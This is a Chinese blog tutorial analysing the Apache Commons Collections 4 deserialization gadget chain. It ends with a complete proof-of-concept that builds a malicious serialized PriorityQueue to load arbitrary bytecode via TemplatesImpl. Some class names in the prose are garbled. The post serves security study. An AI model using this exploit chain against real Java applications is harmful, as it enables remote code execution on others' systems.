安全JAS分析/Java安全_零基础网安入门教程

最新推荐文章于 2025-05-08 17:52:47 发布
最新推荐文章于 2025-05-08 17:52:47 发布
阅读量462 收藏 6
点赞数 5
CC 4.0 BY-SA版权
文章标签: 调用 序列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/saystan/article/details/138945096

安全JAS分析/Java安全_零基础网安入门教程

携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第21天,点击查看活动详情

引子

CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的,对于其利用的限制条件与CC2一致,一样需要在--4.0版本使用,原因是or类在3.1-3.2.1版本中还没有实现接口,无法被反序列化。 接下来让我们仔细分析一下。

是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器的()方法 在CC2中,此类用于调用重写的来作为触发入口

中的间接调用了() 而()最终调用了()

我们先看它的()方法

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Read in size, and any hidden stuff
    s.defaultReadObject();
    // Read in (and discard) array length
    s.readInt();
    queue = new Object[size];
    // Read in all elements.
    for (int i = 0; i < size; i++)
        queue[i] = s.readObject();
    // Elements are guaranteed to be in "proper order", but the
    // spec has never explained what that might be.
    heapify();
}

重写了该方法并在最后调用了()方法,我们跟进一下:

private void heapify() {
    for (int i = (size >>> 1) - 1; i >= 0; i--)
        siftDown(i, (E) queue[i]);
}

这里的话需要长度等于2才能进入for循环,我们要怎样改变长度呢。

这里用到的是该类的add方法,将指定的元素插入此优先级队列。

()调用了()方法,继续跟进:

private void siftDown(int k, E x) {
    if (comparator != null)
        siftDownUsingComparator(k, x);
    else
        siftDownComparable(k, x);
}

可以看到判断条件

 if (comparator != null)

调用了

siftDownUsingComparator(k, x);

在tor()又调用了 .()。

or

可以看到该类在CC3的版本中不能反序列化,在CC4的版本中便可以了。

or是一个修饰器,和CC1中的类似。

or里面存在方法,当我们调用时就会调用传入对象的方法具体实现是this.在传入后,会调用#反射链。

问题

1.就像刚才里面所说的

private void heapify() {
    for (int i = (size >>> 1) - 1; i >= 0; i--)
        siftDown(i, (E) queue[i]);
}

我们要进入循环要修改值,通过add方法。

priorityQueue.add(1);
priorityQueue.add(2);

2.的值要大于1

3. != null

4.通过反射来修改值防止在反序列化前调用,就如之前的链一样,我们到利用时再用反射修改参数。

类似这个样子:

Class c=transformingComparator.getClass();
        Field transformField=c.getDeclaredField("transformer");
        transformField.setAccessible(true);
        transformField.set(transformingComparator,chainedTransformer);

我们先放置个反序列化前不会执行这条链的随便一个参数:

TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));

POC

package ysoserial;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.convert.TransformWriteField;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.LazyMap;
import org.apache.xalan.xsltc.trax.TrAXFilter;
 
 
import javax.xml.crypto.dsig.Transform;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;
 
public class cc4 {
 
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates=new TemplatesImpl();
        Class tc=templates.getClass();
        Field nameField=tc.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"XINO");
        Field bytecodesField=tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
        byte[][] codes={code};
        bytecodesField.set(templates,codes);
 
        Field tfactoryField=tc.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates,new TransformerFactoryImpl());
 
        InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
 
        //
        Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            instantiateTransformer
        };
 
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
 
        TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
 
        PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);
 
        Class c=transformingComparator.getClass();
        Field transformField=c.getDeclaredField("transformer");
        transformField.setAccessible(true);
        transformField.set(transformingComparator,chainedTransformer);
 
 
 
        serialize(priorityQueue);
        unserialize("ser.bin");
 
    }
 
    public static void serialize(Object obj) throws Exception{
        ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oss.writeObject(obj);
    }
 
    public static void unserialize(Object obj) throws Exception{
        ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
        oss.readObject();
    }
 
}

结语

这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。

网络安全学习路线图(思维导图)

网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。

1. 网络安全视频资料

2. 网络安全笔记/面试题

3. 网安电子书PDF资料

如果你向网安入门到进阶的全套资料,我都打包整理好了,需要学习的小伙伴可以V我找我拿~

学网络安全/学黑客,零基础资料整理来啦~~~

~

2019年度优秀安全内容合集
anquanzushiye的博客
01-06 3万+
2019信息源与信息类型占比微信公众号推荐昵称_英语weixin_no标题安全祖师爷PowerShell渗透–帝国https://mp.weixin.qq.com/s/giBR-rn...
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2246
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现—CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
【2024最新】渗透测试工具大全(超详细),收藏这一篇就够了!
2401_85026529的博客
01-21 1252
所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要装并使用以下所有工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。重点提醒:本项目工具来源于互联,是否含带及后门请自行甄别!!
2025版最新渗透测试工具大全(非常详细)零基础入门到精通,收藏这一篇就够了
logic1001的博客
05-08 1350
所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要装并使用以下所有工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。重点提醒:本项目工具来源于互联,是否含带木马及后门请自行甄别!!
2024版最新渗透测试工具大全(非常详细)零基础入门到精通,收藏这一篇就够了
wholeliubei的博客
10-24 631
所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要装并使用以下所有工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。重点提醒:本项目工具来源于互联,是否含带木马及后门请自行甄别!!
jas.zip_JAS JAVA
09-23
Java EE 的藍圖中,JSP Servlet是屬於Web層技術,JSP與Servlet是一體的兩面,您可以使用單獨一項技術來解決動態網頁呈現的需求,但最好的方式是取兩者的長處,JSP是網頁設計人員導向的,而Servlet是程式設計人員...
0day-安全性-软件-漏洞分析技术:0day安全_软件突破分析技术
02-06
0day-安全性-软件-漏洞分析技术 《 0day安全:软件突破分析技术(第二版)》随书资料包使用注意事项 资料包中资料仅用于学习目的,任何组织,个人,机构不可以任何形式利用资料包中的资料进行商业盈利目的的活动。 ...
import os from transformers import Wav2Vec2Processor import librosa audio, sr = librosa.load("louis5.wav", sr=16000) # cache_dir = "/home/jas/my_hf_cache" # A writable directory you create processor = Wav2Vec2Processor.from_pretrained( "facebook/wav2vec2-base-960h", # cache_dir=cache_dir ) input_values = processor(audio, sampling_rate=sr, return_tensors="pt").input_values from transformers import Wav2Vec2ForSequenceClassification model = Wav2Vec2ForSequenceClassification.from_pretrained( "facebook/wav2vec2-base-960h", num_labels=2 # 根据任务修改分类数 )根据我现有的音频帮我重写上面的代码
03-21
4. **模型输出**:SequenceClassification模型在基础模型后添加线性分类层,输出维度由num_labels参数决定 ### 三、性能优化建议 ```python # 启用GPU加速 model = model.to("cuda") inputs = {k: v.to("cuda") for...
初级java笔试题-jas497_476:EECS476的最终项目
06-03
初级java笔试题jas497 的最终 476 项目,詹姆斯·斯塔克曼 (自我注意:查看美化版本) 这个 476 项目的目标是毫不含糊地解释 Gazebo (GZ) 插件 (GZP) 是如何编写的。 它适合未来的 /[34]76/[^regex] 学生(和教授)...
算法设计与分析——并查集(Union-find Disjoint Sets)
冯·诺依曼
02-25 1万+
一些应用涉及将nnn个不同的元素分成一组不相交的集合。这些应用经常需要进行两种特别的操作: 寻找包含给定元素的唯一集合 合并两个集合 一个不相交集合数据结构维护了一个不相交动态集的集合S={S1,S2,⋯ ,Sk}\mathbb{S}=\{S_1, S_2, \cdots, S_k\}S={S1​,S2​,⋯,Sk​}。我们用一个代表来标识每个集合,它是这个集合的某个成员。在一些应用中,我们不关心哪个成员被用来作为代表,仅仅关心的是2次查询动态集合的代表中,如果这些查询没有修改动态集合,则这两次查询应该
拦不住灰犀牛,芯片短缺即将扭转,小型公司风险骤增!
graymount的博客
02-23 7401
微信群消息,有人到处在各个群里推销芯片。舆论层面,芯片缺货似乎仍在继续,囤货似乎仍然是主流。为什么已经有人开始到处推销芯片了?因为他们已经预感到芯片供需拐点即将到来。我们先来看看需求侧。首...
NFT Insider #47:YGG发布2021Q4社区报告,GameFi领域1月份获超10亿美元融资
BeepCrypto的博客
02-25 2340
引言:NFT Insider由WHALE社区、BeepCrypto联合出品,浓缩每周NFT新闻,为大家带来关于NFT最全面、最新鲜、最有价值的讯息。每期周报将从NFT市场数据,艺术新闻类,游戏新闻类,虚拟世界类,其他动态类,五个角度剖析NFT市场现状,了解NFT,读NFT Insider周报就够了。 市场数据 2月21日NFT市场日交易额为5221万美元,跌势暂缓 据 NonFungible 数据显示,2月21日NFT市场日交易额为5221万美元,日交易数为19583。本月持续下降
6.C++ 双向循环表类模版实现
抵抗时间扭曲,坚持做一件有意义的事
02-24 1112
在上章4.C++ 图解单向表类模板、iterator迭代器类模版实现_抵抗时间扭曲,坚持做一件有意义的事-CSDN博客_表类模板的实现 我们学习了单表,所以本章来学习双向循环表 我们在上个文章代码上进行修改, 由于双向循环表在我们之前学的单表上相对于较为复杂,所以需要注意的细节如下所示. 1.插入某个节点流程 如下图所示: 对应代码如下所示: /*插入一个新的节点*/ bool insert(int i, const T& value) { .
面向区块的高效物化视图维护和可信查询
m0_62870606的博客
02-25 9557
面向区块的高效物化视图维护和可信查询 人工智能技术与咨询 来源:《软件学报》,作者蔡 磊等 摘 要:区块具有去中心化、不可篡改和可追溯等特性,可应用于金融、物流等诸多行业.由于所有交易数据按照交易时间顺序存储在各个区块,相同类型的交易数据通常会散布在诸多区块之中,降低了面向历史区块的追溯查询的处理效率.索引构建和物化视图是提升查询性能的两种典型方法,但当待处理数据分布于多个区块时,使用索引无法改善I/O 访问效率,而物化视图可有效应对这个问题.然而,由于区块系统的特点明显区别于关系数据库..
线索化二叉树---(韩顺平数据结构)笔记
唐昊
02-23 596
package tree.threadedbinarytree; import java.util.concurrent.SynchronousQueue; public class ThreadedBinaryTreeDemo { public static void main(String[] args) { //测试一把中序线索二叉树的功能 HeroNode root = new HeroNode(1, "tom"); HeroNode node2 = new HeroNode(3
交流异步电机矢量控制(三)——磁场定向与磁观测器的设计
热门推荐
sy243772901的博客
02-22 4万+
前言:从前面的文章得知,磁场定向是实现矢量控制的关键操作,而如何实现精准的磁场定向一直是电机控制领域保持研究的课题,一方面是因为磁场定向的方式有多种,另一方面是因为磁场方向非常难以测量,而磁场方向又是磁场定向的基础,因此必须通过特定的手段不断提高磁场定向的精度。 针对这两方面的问题,本篇博客解决的目标问题:不同磁场定向方式的比较分析 及 如何实现精准的磁场定向。 1 不同磁场定向方式的分析比较 在磁场定向方式下,下图所示空间旋转坐标系d轴的正方向和异步电机磁空间矢量的正方向保持一致。异步电机的磁
Leetcode 刷题笔记(二十三) ——动态规划篇之基础题目
a1241692733的博客
02-25 3387
动态规划中每一个状态一定是由上一个状态推导出来的
利用BP神经络潜在蒸发预测蒸发量
最新发布
08-15
资源下载接为: https://pan.quark.cn/s/51751dab8b8a 利用BP神经络潜在蒸发预测蒸发量(最新、最全版本!打开接下载即可用!)
Java基础入门:语言、平台与开发流程详解
Java基础入门教程是一份全面的教程,旨在帮助初学者快速理解和掌握Java编程语言。本教程由Java私塾提供,包括教学目标和详细内容,旨在通过一系列深入浅出的方式,让学员对Java有全面的认识。 首先,Java被定义为:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值